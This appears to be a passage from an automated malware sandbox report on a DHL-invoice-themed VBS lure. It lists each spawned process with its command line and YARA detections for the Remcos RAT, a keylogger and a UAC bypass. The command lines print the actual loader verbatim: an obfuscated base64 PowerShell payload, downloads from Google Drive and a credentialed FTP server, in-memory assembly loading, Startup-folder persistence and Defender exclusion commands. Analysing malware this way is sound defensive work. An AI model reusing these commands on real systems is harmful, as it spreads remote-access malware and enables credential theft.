'0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHkAYg' + [char]66 + 'uAGoAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '5AGIAbg' + [char]66 + 'qAG0AJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAeQ' + [char]66 + 'mAGwAeQAkACgAIAA9ACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + '5AGYAbA' + [char]66 + '5ACQAKAAgAD0AIA' + [char]66 + 'xAHkAZg' + [char]66 + 'sAHkAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAeQ' + [char]66 + 'mAGwAeQAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$tcqrr = $qKKzc; ;$tcqrr = $qKKzc.replace('???' , 'B') ;;$nnwch = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tcqrr ) ); $nnwch = $nnwch[-1..-$nnwch.Length] -join '';$nnwch = $nnwch.replace('%XRqhI%','C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs');powershell $nnwch
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:05:10:09
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:05:10:12
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:05:10:23
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:05:10:23
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2304620541.0000024FB4B62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:05:10:24
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                                          Imagebase:0x7ff631c80000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:05:10:25
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:05:10:30
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:05:10:32
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1"
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          Target ID:14
                                          Start time:05:10:32
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                                          Imagebase:0x7ff631c80000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:15
                                          Start time:05:10:35
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                          Imagebase:0xd00000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3340320354.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                          Has exited:false

                                          Target ID:16
                                          Start time:05:10:37
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          Imagebase:0x7ff631c80000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:05:10:37
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:05:10:37
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Has exited:true

                                          Target ID:19
                                          Start time:05:10:37
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:05:10:40
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                          Imagebase:0x870000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          Has exited:true

                                          Target ID:21
                                          Start time:05:10:42
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin"
                                          Imagebase:0xd50000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:05:10:42
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                                          Imagebase:0x2a0000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:05:10:43
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                                          Imagebase:0xdf0000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:05:10:43
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv"
                                          Imagebase:0x640000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:05:10:45
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          Imagebase:0x7ff631c80000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:05:10:45
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:05:10:45
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                                          Imagebase:0x7ff7be880000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Has exited:true

                                          Target ID:28
                                          Start time:05:10:45
                                          Start date:14/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:05:10:47
                                          Start date:14/10/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                          Imagebase:0xe70000
                                          File size:43'008 bytes
                                          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                          Has exited:true

                                          Reset < >
                                            Memory Dump Source
